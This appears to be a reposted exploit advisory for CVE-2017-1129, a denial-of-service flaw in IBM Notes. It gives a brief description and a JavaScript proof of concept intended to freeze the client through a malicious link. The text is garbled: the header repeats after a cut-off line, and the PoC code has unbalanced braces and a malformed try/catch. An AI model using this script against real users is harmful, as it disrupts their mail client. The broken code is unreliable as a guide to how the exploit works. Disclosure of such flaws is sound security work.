# Exploit Title: IBM Notes is affected by a denial of service vulnerability
# Date: 31 August 2017
# Software Link: https://www-01.ibm.com/support/docview.wss?uid=swg24037141
# Expl # Exploit Title: IBM Notes is affected by a denial of service vulnerability
# Date: 31 August 2017
# Software Link: https://www-01.ibm.com/support/docview.wss?uid=swg24037141
# Exploit Author: Dhiraj Mishra
# Contact: http://twitter.com/mishradhiraj_
# Website: http://datarift.blogspot.in/
# CVE: CVE-2017-1129
# Category: IBM Notes (Console Application)
1. Description
IBM Notes is vulnerable to a denial of service involving persuading a user to click on a malicious link, which would ultimately cause the client to have to be restarted.
2. Proof of concept
<script type="text/javascript">
while (true) try {
var object = { };
function g(f0) {
var f0 = (object instanceof encodeURI)('foo');
} catch (g) { }
3. IBM Security Bulletin
IBM Notes 8.5.x 9.0.x Denial Of Service
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 466